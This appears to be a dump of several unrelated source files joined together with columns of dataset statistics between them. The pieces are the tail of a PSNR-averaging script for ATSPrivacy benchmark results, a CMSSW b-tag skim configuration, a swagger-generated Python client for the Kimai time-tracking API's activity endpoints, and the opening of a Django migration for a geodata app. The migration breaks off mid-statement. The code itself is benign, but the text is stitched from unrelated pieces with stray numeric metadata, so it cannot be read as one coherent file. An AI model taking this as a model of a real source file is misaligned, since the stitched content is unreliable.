sum_+=result[i]['test_psnr']
if result[i]['test_psnr']>max_psnr:
max_psnr = result[i]['test_psnr']
print('----------------------------------')
print('number of result:{}'.format(len(result)))
print('ResNet+3-1-7:')
print('average: {}'.format(sum_/len(result)))
print('max:{}'.format(max_psnr))
#! MoEx
file = '/home/remote/u7076589/ATSPrivacy/benchmark/images/MoEx_data_cifar100_arch_ResNet20-4_epoch_200_optim_inversed_mode_aug_auglist__rlabel_False/metric.npy'
result = np.load(file,allow_pickle=True)
sum_ = 0
max_psnr = 0
for i in range(len(result)):
sum_+=result[i]['test_psnr']
if result[i]['test_psnr']>max_psnr:
max_psnr = result[i]['test_psnr']
print('----------------------------------')
print('number of result:{}'.format(len(result)))
print('ResNet:')
print('average: {}'.format(sum_/len(result)))
print('max:{}'.format(max_psnr))
| 39.96988
| 176
| 0.674604
| 1,032
| 6,635
| 4.070736
| 0.060078
| 0.073316
| 0.086408
| 0.117829
| 0.994763
| 0.994763
| 0.993811
| 0.992383
| 0.992383
| 0.992383
| 0
| 0.066038
| 0.089375
| 6,635
| 166
| 177
| 39.96988
| 0.629262
| 0.287415
| 0
| 0.838095
| 0
| 0.066667
| 0.466196
| 0.336329
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.009524
| 0
| 0.009524
| 0.380952
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0e76e87e53656c552a94032fe88c1f3cfff5810f
| 152
|
py
|
Python
|
RecoBTag/Skimming/python/btagMC_QCD_380_470_SkimPaths_cff.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 852
|
2015-01-11T21:03:51.000Z
|
2022-03-25T21:14:00.000Z
|
RecoBTag/Skimming/python/btagMC_QCD_380_470_SkimPaths_cff.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 30,371
|
2015-01-02T00:14:40.000Z
|
2022-03-31T23:26:05.000Z
|
RecoBTag/Skimming/python/btagMC_QCD_380_470_SkimPaths_cff.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 3,240
|
2015-01-02T05:53:18.000Z
|
2022-03-31T17:24:21.000Z
|
import FWCore.ParameterSet.Config as cms
from RecoBTag.Skimming.btagMC_QCD_380_470_cfi import *
btagMC_QCD_380_470Path = cms.Path(btagMC_QCD_380_470)
| 25.333333
| 54
| 0.855263
| 25
| 152
| 4.8
| 0.64
| 0.225
| 0.3
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129496
| 0.085526
| 152
| 5
| 55
| 30.4
| 0.733813
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0ea36a6287c6284e0f0f9e2e53432d62f96dc1d8
| 34,343
|
py
|
Python
|
kimai_python/api/activity_api.py
|
MPW1412/kimai-python
|
7c89b0866b85fbc4b1092b30eca21f1be48db533
|
[
"MIT"
] | null | null | null |
kimai_python/api/activity_api.py
|
MPW1412/kimai-python
|
7c89b0866b85fbc4b1092b30eca21f1be48db533
|
[
"MIT"
] | null | null | null |
kimai_python/api/activity_api.py
|
MPW1412/kimai-python
|
7c89b0866b85fbc4b1092b30eca21f1be48db533
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Kimai 2 - API Docs
JSON API for the Kimai 2 time-tracking software. Read more about its usage in the [API documentation](https://www.kimai.org/documentation/rest-api.html) and then download a [Swagger file](doc.json) for import e.g. in Postman. Be aware: it is not yet considered stable and BC breaks might happen. # noqa: E501
OpenAPI spec version: 0.5
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from kimai_python.api_client import ApiClient
class ActivityApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def api_activities_get(self, **kwargs): # noqa: E501
"""Returns a collection of activities # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_activities_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str project: Project ID to filter activities
:param str projects: Comma separated list of project IDs to filter activities
:param str visible: Visibility status to filter activities. Allowed values: 1=visible, 2=hidden, 3=all (default: 1)
:param str globals: Use if you want to fetch only global activities. Allowed values: true (default: false)
:param str globals_first: Deprecated parameter, value is not used any more
:param str order_by: The field by which results will be ordered. Allowed values: id, name, project (default: name)
:param str order: The result order. Allowed values: ASC, DESC (default: ASC)
:param str term: Free search term
:return: list[ActivityCollection]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.api_activities_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.api_activities_get_with_http_info(**kwargs) # noqa: E501
return data
def api_activities_get_with_http_info(self, **kwargs): # noqa: E501
"""Returns a collection of activities # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_activities_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str project: Project ID to filter activities
:param str projects: Comma separated list of project IDs to filter activities
:param str visible: Visibility status to filter activities. Allowed values: 1=visible, 2=hidden, 3=all (default: 1)
:param str globals: Use if you want to fetch only global activities. Allowed values: true (default: false)
:param str globals_first: Deprecated parameter, value is not used any more
:param str order_by: The field by which results will be ordered. Allowed values: id, name, project (default: name)
:param str order: The result order. Allowed values: ASC, DESC (default: ASC)
:param str term: Free search term
:return: list[ActivityCollection]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project', 'projects', 'visible', 'globals', 'globals_first', 'order_by', 'order', 'term'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method api_activities_get" % key
)
params[key] = val
del params['kwargs']
if 'project' in params and not re.search(r'\\d+', params['project']): # noqa: E501
raise ValueError("Invalid value for parameter `project` when calling `api_activities_get`, must conform to the pattern `/\\d+/`") # noqa: E501
if 'projects' in params and not re.search(r'[\\d|,]+', params['projects']): # noqa: E501
raise ValueError("Invalid value for parameter `projects` when calling `api_activities_get`, must conform to the pattern `/[\\d|,]+/`") # noqa: E501
if 'visible' in params and not re.search(r'1|2|3', params['visible']): # noqa: E501
raise ValueError("Invalid value for parameter `visible` when calling `api_activities_get`, must conform to the pattern `/1|2|3/`") # noqa: E501
if 'globals' in params and not re.search(r'true', params['globals']): # noqa: E501
raise ValueError("Invalid value for parameter `globals` when calling `api_activities_get`, must conform to the pattern `/true/`") # noqa: E501
if 'globals_first' in params and not re.search(r'true|false', params['globals_first']): # noqa: E501
raise ValueError("Invalid value for parameter `globals_first` when calling `api_activities_get`, must conform to the pattern `/true|false/`") # noqa: E501
if 'order_by' in params and not re.search(r'id|name|project', params['order_by']): # noqa: E501
raise ValueError("Invalid value for parameter `order_by` when calling `api_activities_get`, must conform to the pattern `/id|name|project/`") # noqa: E501
if 'order' in params and not re.search(r'ASC|DESC', params['order']): # noqa: E501
raise ValueError("Invalid value for parameter `order` when calling `api_activities_get`, must conform to the pattern `/ASC|DESC/`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'project' in params:
query_params.append(('project', params['project'])) # noqa: E501
if 'projects' in params:
query_params.append(('projects', params['projects'])) # noqa: E501
if 'visible' in params:
query_params.append(('visible', params['visible'])) # noqa: E501
if 'globals' in params:
query_params.append(('globals', params['globals'])) # noqa: E501
if 'globals_first' in params:
query_params.append(('globalsFirst', params['globals_first'])) # noqa: E501
if 'order_by' in params:
query_params.append(('orderBy', params['order_by'])) # noqa: E501
if 'order' in params:
query_params.append(('order', params['order'])) # noqa: E501
if 'term' in params:
query_params.append(('term', params['term'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['apiToken', 'apiUser'] # noqa: E501
return self.api_client.call_api(
'/api/activities', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ActivityCollection]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def api_activities_id_get(self, id, **kwargs): # noqa: E501
"""Returns one activity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_activities_id_get(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: Activity ID to fetch (required)
:return: ActivityEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.api_activities_id_get_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.api_activities_id_get_with_http_info(id, **kwargs) # noqa: E501
return data
def api_activities_id_get_with_http_info(self, id, **kwargs): # noqa: E501
"""Returns one activity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_activities_id_get_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: Activity ID to fetch (required)
:return: ActivityEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method api_activities_id_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `api_activities_id_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['apiToken', 'apiUser'] # noqa: E501
return self.api_client.call_api(
'/api/activities/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ActivityEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def api_activities_id_meta_patch(self, id, **kwargs): # noqa: E501
"""Sets the value of a meta-field for an existing activity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_activities_id_meta_patch(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: Activity record ID to set the meta-field value for (required)
:param Body body:
:return: ActivityEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.api_activities_id_meta_patch_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.api_activities_id_meta_patch_with_http_info(id, **kwargs) # noqa: E501
return data
def api_activities_id_meta_patch_with_http_info(self, id, **kwargs): # noqa: E501
"""Sets the value of a meta-field for an existing activity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_activities_id_meta_patch_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: Activity record ID to set the meta-field value for (required)
:param Body body:
:return: ActivityEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method api_activities_id_meta_patch" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `api_activities_id_meta_patch`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = ['apiToken', 'apiUser'] # noqa: E501
return self.api_client.call_api(
'/api/activities/{id}/meta', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ActivityEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def api_activities_id_patch(self, body, id, **kwargs): # noqa: E501
"""Update an existing activity # noqa: E501
Update an existing activity, you can pass all or just a subset of all attributes # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_activities_id_patch(body, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ActivityEditForm body: (required)
:param int id: Activity ID to update (required)
:return: ActivityEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.api_activities_id_patch_with_http_info(body, id, **kwargs) # noqa: E501
else:
(data) = self.api_activities_id_patch_with_http_info(body, id, **kwargs) # noqa: E501
return data
def api_activities_id_patch_with_http_info(self, body, id, **kwargs): # noqa: E501
"""Update an existing activity # noqa: E501
Update an existing activity, you can pass all or just a subset of all attributes # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_activities_id_patch_with_http_info(body, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ActivityEditForm body: (required)
:param int id: Activity ID to update (required)
:return: ActivityEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method api_activities_id_patch" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `api_activities_id_patch`") # noqa: E501
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `api_activities_id_patch`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = ['apiToken', 'apiUser'] # noqa: E501
return self.api_client.call_api(
'/api/activities/{id}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ActivityEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def api_activities_id_rates_get(self, id, **kwargs): # noqa: E501
"""Returns a collection of all rates for one activity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_activities_id_rates_get(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The activity whose rates will be returned (required)
:return: list[ActivityRate]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.api_activities_id_rates_get_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.api_activities_id_rates_get_with_http_info(id, **kwargs) # noqa: E501
return data
def api_activities_id_rates_get_with_http_info(self, id, **kwargs): # noqa: E501
"""Returns a collection of all rates for one activity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_activities_id_rates_get_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The activity whose rates will be returned (required)
:return: list[ActivityRate]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method api_activities_id_rates_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `api_activities_id_rates_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['apiToken', 'apiUser'] # noqa: E501
return self.api_client.call_api(
'/api/activities/{id}/rates', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ActivityRate]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def api_activities_id_rates_post(self, id, body, **kwargs): # noqa: E501
"""Adds a new rate to an activity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_activities_id_rates_post(id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The activity to add the rate for (required)
:param ActivityRateForm body: (required)
:return: ActivityRate
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.api_activities_id_rates_post_with_http_info(id, body, **kwargs) # noqa: E501
else:
(data) = self.api_activities_id_rates_post_with_http_info(id, body, **kwargs) # noqa: E501
return data
def api_activities_id_rates_post_with_http_info(self, id, body, **kwargs): # noqa: E501
"""Adds a new rate to an activity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_activities_id_rates_post_with_http_info(id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The activity to add the rate for (required)
:param ActivityRateForm body: (required)
:return: ActivityRate
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method api_activities_id_rates_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `api_activities_id_rates_post`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `api_activities_id_rates_post`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = ['apiToken', 'apiUser'] # noqa: E501
return self.api_client.call_api(
'/api/activities/{id}/rates', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ActivityRate', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def api_activities_id_rates_rate_id_delete(self, id, rate_id, **kwargs): # noqa: E501
"""Deletes one rate for an activity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_activities_id_rates_rate_id_delete(id, rate_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The activity whose rate will be removed (required)
:param int rate_id: The rate to remove (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.api_activities_id_rates_rate_id_delete_with_http_info(id, rate_id, **kwargs) # noqa: E501
else:
(data) = self.api_activities_id_rates_rate_id_delete_with_http_info(id, rate_id, **kwargs) # noqa: E501
return data
def api_activities_id_rates_rate_id_delete_with_http_info(self, id, rate_id, **kwargs): # noqa: E501
"""Deletes one rate for an activity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_activities_id_rates_rate_id_delete_with_http_info(id, rate_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The activity whose rate will be removed (required)
:param int rate_id: The rate to remove (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'rate_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method api_activities_id_rates_rate_id_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `api_activities_id_rates_rate_id_delete`") # noqa: E501
# verify the required parameter 'rate_id' is set
if ('rate_id' not in params or
params['rate_id'] is None):
raise ValueError("Missing the required parameter `rate_id` when calling `api_activities_id_rates_rate_id_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
if 'rate_id' in params:
path_params['rateId'] = params['rate_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['apiToken', 'apiUser'] # noqa: E501
return self.api_client.call_api(
'/api/activities/{id}/rates/{rateId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def api_activities_post(self, body, **kwargs): # noqa: E501
"""Creates a new activity # noqa: E501
Creates a new activity and returns it afterwards # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_activities_post(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ActivityEditForm body: (required)
:return: ActivityEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.api_activities_post_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.api_activities_post_with_http_info(body, **kwargs) # noqa: E501
return data
def api_activities_post_with_http_info(self, body, **kwargs): # noqa: E501
"""Creates a new activity # noqa: E501
Creates a new activity and returns it afterwards # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_activities_post_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ActivityEditForm body: (required)
:return: ActivityEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method api_activities_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `api_activities_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = ['apiToken', 'apiUser'] # noqa: E501
return self.api_client.call_api(
'/api/activities', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ActivityEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 42.035496
| 314
| 0.614245
| 4,153
| 34,343
| 4.849506
| 0.060197
| 0.046077
| 0.042453
| 0.0286
| 0.946375
| 0.933615
| 0.921053
| 0.906653
| 0.886544
| 0.867229
| 0
| 0.015341
| 0.293946
| 34,343
| 816
| 315
| 42.08701
| 0.815242
| 0.335265
| 0
| 0.740577
| 0
| 0.008869
| 0.216799
| 0.060188
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037694
| false
| 0
| 0.008869
| 0
| 0.101996
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7ecea1dee90d39f5a9e50539aad613fcc30bd0c6
| 12,934
|
py
|
Python
|
codenerix_geodata/migrations/0001_initial.py
|
centrologic/django-codenerix-geodata
|
42d8cca77857765db4ead311608dfee55711ff51
|
[
"Apache-2.0"
] | 1
|
2017-11-23T13:28:19.000Z
|
2017-11-23T13:28:19.000Z
|
codenerix_geodata/migrations/0001_initial.py
|
centrologic/django-codenerix-geodata
|
42d8cca77857765db4ead311608dfee55711ff51
|
[
"Apache-2.0"
] | null | null | null |
codenerix_geodata/migrations/0001_initial.py
|
centrologic/django-codenerix-geodata
|
42d8cca77857765db4ead311608dfee55711ff51
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-09-18 08:08
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='City',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
],
options={
'abstract': False,
'default_permissions': ('add', 'change', 'delete', 'view', 'list'),
},
),
migrations.CreateModel(
name='CityGeoNameEN',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('name', models.CharField(max_length=100, verbose_name='Name')),
('city', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='en', to='codenerix_geodata.City')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='CityGeoNameES',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('name', models.CharField(max_length=100, verbose_name='Name')),
('city', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='es', to='codenerix_geodata.City')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Continent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('code', models.CharField(max_length=2, unique=True, verbose_name='Code')),
],
options={
'abstract': False,
'default_permissions': ('add', 'change', 'delete', 'view', 'list'),
},
),
migrations.CreateModel(
name='ContinentGeoNameEN',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('name', models.CharField(max_length=100, verbose_name='Name')),
('continent', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='en', to='codenerix_geodata.Continent')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='ContinentGeoNameES',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('name', models.CharField(max_length=100, verbose_name='Name')),
('continent', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='es', to='codenerix_geodata.Continent')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
